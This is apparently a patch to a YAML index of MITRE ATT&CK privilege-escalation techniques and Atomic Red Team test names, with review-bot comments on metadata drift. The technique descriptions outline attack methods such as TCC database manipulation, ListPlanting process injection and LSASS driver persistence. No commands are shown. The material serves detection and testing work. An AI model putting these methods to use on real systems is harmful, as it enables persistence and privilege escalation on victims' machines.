created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -46763,7 +47062,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -46996,7 +47294,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -47019,7 +47316,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -47049,12 +47346,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
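Review bot: T1037.003 is another object whose `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with no replacement, and its `modified` moves back from 2021-04-29 to 2020-03-24; together with the backwards `modified` on T1546.010 directly below (2023-05-09 -> 2023-04-21), this suggests these objects came from an older or differently processed source than the ones that now carry 3.2.0. Verify both objects against the current ATT&CK STIX bundle before merging.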
@@ -47139,7 +47434,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -47263,7 +47557,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -47372,7 +47665,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -47400,7 +47693,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -47547,7 +47839,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -47590,12 +47882,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -47612,7 +47902,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
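Review bot: `Alexander Rodchenko` becomes `Rodchenko Aleksandr` (surname first, transliteration changed), while the T1078 hunk earlier in this patch flips `Goldstein Menachem` to `Menachem Goldstein` (given name first). If contributor strings are copied verbatim from the upstream ATT&CK objects this is fine but worth stating in the commit message; otherwise pick one convention for the index.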
@@ -47671,7 +47961,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -47753,7 +48042,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -47815,7 +48103,7 @@ privilege-escalation:
'
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -47912,7 +48200,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -48026,7 +48313,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -48250,7 +48536,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -48278,7 +48563,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -48322,8 +48607,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -48359,7 +48642,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -48378,7 +48661,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests:
- name: Copy in loginwindow.plist for Re-Opened Applications
@@ -48472,7 +48754,7 @@ privilege-escalation:
name: sh
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -48522,7 +48804,6 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -48641,7 +48922,7 @@ privilege-escalation:
elevation_required: true
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -48674,9 +48955,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
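Review bot: the combined contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two entries, and the Gurucul affiliation now attaches only to Nilesh Dherange. Confirm the split and the dropped affiliation for Naveen Vijayaraghavan mirror the upstream object rather than being an artefact of splitting the string on the comma.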
@@ -48693,9 +48975,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -48741,7 +49022,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests:
- name: EXO - Full access mailbox permission granted to a user
@@ -48797,33 +49077,15 @@ privilege-escalation:
elevation_required: false
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
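Review bot: the TCC description switches to a `|+` block scalar followed by a blank line, so the value now ends in two newlines, whereas the other block-scalar descriptions in this file use `|-` and strip trailing newlines; unless a consumer depends on the exact trailing whitespace, `|-` would be consistent and avoids the keep indicator. The upstream wording `an overwrites file (if connected to an MDM)` is carried over verbatim; it reads oddly but should not be edited here since the index mirrors ATT&CK.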
@@ -48831,6 +49093,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -48838,7 +49102,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -48868,7 +49132,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -48914,7 +49177,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
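Review bot: `modified` moves backwards here (2022-04-25 to 2021-10-18), and the same pattern recurs for several techniques below (T1037.001, T1547.008, T1546.007, T1574.004, T1574.012). If the generator copies `modified` verbatim from the upstream bundle this can happen when the old value came from an intermediate release, but it is worth confirming the source snapshot is the current ATT&CK release rather than an older one.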
@@ -48959,8 +49222,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
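Review bot: for T1055.008 the removal of `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` leaves the technique with no attack-spec version at all, whereas other techniques in this patch keep the field or bump it to 3.2.0; the same happens to T1037.001 and T1574.012 further down. If the upstream object genuinely lacks the field, fine, but an inconsistency like this usually means the source bundle mixes objects from different ATT&CK versions.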
@@ -48986,7 +49247,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -49012,8 +49273,6 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -49043,53 +49302,24 @@ privilege-escalation:
name: command_prompt
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
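Review bot: the `SysListView32`, `FindWindow` and `EnumWindows` tokens sit on their own lines with the surrounding text broken around them (e.g. `SysListView32` followed by `control.\n\nListPlanting (a`), in both the removed and the added description, which looks like inline `<code>` markup was stripped before the YAML was written. Check the generator's handling of HTML in descriptions; the double-quoted scalar still parses, but the folded lines produce odd spacing around those names.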
@@ -49106,6 +49336,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -49120,16 +49353,47 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
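Review bot: the `Microsoft List View Controls` entry keeps the `docs.microsoft.com` URL, which now redirects to `learn.microsoft.com`; since this patch refreshes other stale links (harmj0y, twitter.com) with new retrieved dates, consider refreshing this one the same way, or leave it as upstream ATT&CK has it if the index is meant to be a verbatim mirror. The new `Hexacorn Listplanting` reference does match the `(Citation: Hexacorn Listplanting)` added to the description, so the citation key is resolvable.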
@@ -49169,7 +49433,7 @@ privilege-escalation:
elevation_required: true
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -49214,9 +49478,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
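Review bot: for T1484 `SaaS` is dropped from `x_mitre_platforms` rather than renamed, while `Azure AD` becomes `Identity Provider`; if a per-platform index is generated from this list, T1484 will disappear from the SaaS index, so confirm that is the intended upstream change and that the derived CSVs were regenerated together with this file.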
@@ -49273,8 +49536,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -49283,7 +49546,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -49325,7 +49587,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -49350,7 +49612,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests:
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -49394,7 +49655,7 @@ privilege-escalation:
elevation_required: true
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -49434,8 +49695,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -49443,13 +49706,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
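Review bot: same concern as for T1098.002 above: `Azure AD`, `Office 365` and `Google Workspace` disappear from T1078.004's `x_mitre_platforms`, replaced by `Office Suite` and `Identity Provider`, while `SaaS` and `IaaS` stay. Any platform index keyed on the literal string `Google Workspace` will no longer pick up this technique, so the platform-specific CSVs need the same platform mapping applied or they will drift from this file.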
@@ -49480,9 +49743,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -49683,10 +49943,10 @@ privilege-escalation:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
